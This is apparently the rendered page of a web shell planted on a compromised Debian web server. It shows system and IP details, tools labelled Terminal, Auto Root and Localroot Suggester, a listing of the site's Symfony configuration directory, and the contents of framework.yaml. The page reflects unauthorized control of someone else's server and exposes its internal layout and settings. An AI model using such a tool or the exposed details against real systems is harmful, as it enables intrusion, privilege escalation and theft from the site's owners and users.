Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.79
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
config /
packages /
Delete
Unzip
Name
Size
Permission
Date
Action
dev
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
test
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
cache.yaml
687
B
-rwxrwxr-x
2025-06-19 08:10
debug.yaml
261
B
-rwxrwxr-x
2025-06-19 08:10
doctrine.yaml
6.66
KB
-rwxrwxr-x
2026-05-18 12:51
doctrine_migrations.yaml
268
B
-rwxrwxr-x
2025-06-19 08:10
ewz_recaptcha.yaml
191
B
-rwxrwxr-x
2025-06-19 08:10
framework.yaml
1.02
KB
-rwxrwxr-x
2026-04-02 11:48
google_recaptcha.yaml
988
B
-rwxrwxr-x
2025-06-19 08:10
league_oauth2_server.yaml
533
B
-rwxrwxr-x
2025-07-04 14:25
mailer.yaml
56
B
-rwxrwxr-x
2025-06-19 08:10
messenger.yaml
865
B
-rwxrwxr-x
2025-06-19 08:10
monolog.yaml
2.83
KB
-rwxrwxr-x
2026-04-02 11:48
nelmio_cors.yaml
323
B
-rwxrwxr-x
2025-07-04 14:25
notifier.yaml
357
B
-rwxrwxr-x
2025-06-19 08:10
nyholm_psr7.yaml
627
B
-rwxrwxr-x
2025-07-04 14:25
ramsey_uuid_doctrine.yaml
85
B
-rwxrwxr-x
2025-06-19 08:10
routing.yaml
335
B
-rwxrwxr-x
2025-06-19 08:10
security.yaml
3.33
KB
-rwxrwxr-x
2026-05-20 09:05
sonata_admin.yaml
293
B
-rwxrwxr-x
2025-07-04 14:25
sonata_block.yaml
17
B
-rwxrwxr-x
2026-05-18 12:51
sonata_form.yaml
37
B
-rwxrwxr-x
2025-06-19 08:10
translation.yaml
418
B
-rwxrwxr-x
2025-06-19 08:10
twig.yaml
873
B
-rwxrwxr-x
2026-05-18 12:51
uid.yaml
87
B
-rwxrwxr-x
2025-06-19 08:10
validator.yaml
354
B
-rwxrwxr-x
2025-06-19 08:10
web_profiler.yaml
337
B
-rwxrwxr-x
2025-06-19 08:10
webpack_encore.yaml
1.65
KB
-rwxrwxr-x
2025-06-19 08:10
Save
Rename
# see https://symfony.com/doc/current/reference/configuration/framework.html framework: secret: '%env(APP_SECRET)%' csrf_protection: true http_method_override: false handle_all_throwables: true error_controller: App\CoreBundle\Controller\DefaultController::exceptionAction # Enables session support. Note that the session will ONLY be started if you read or write from it. # Remove or comment this section to explicitly disable session support. session: handler_id: 'session.handler.native_file' save_path: '%kernel.project_dir%/var/sessions/%kernel.environment%' cookie_secure: auto cookie_samesite: lax # storage_factory_id: session.storage.factory.native #esi: true #fragments: true php_errors: log: true when@test: framework: test: true session: storage_factory_id: session.storage.factory.mock_file when@prod: framework: error_controller: App\CoreBundle\Controller\DefaultController::exceptionAction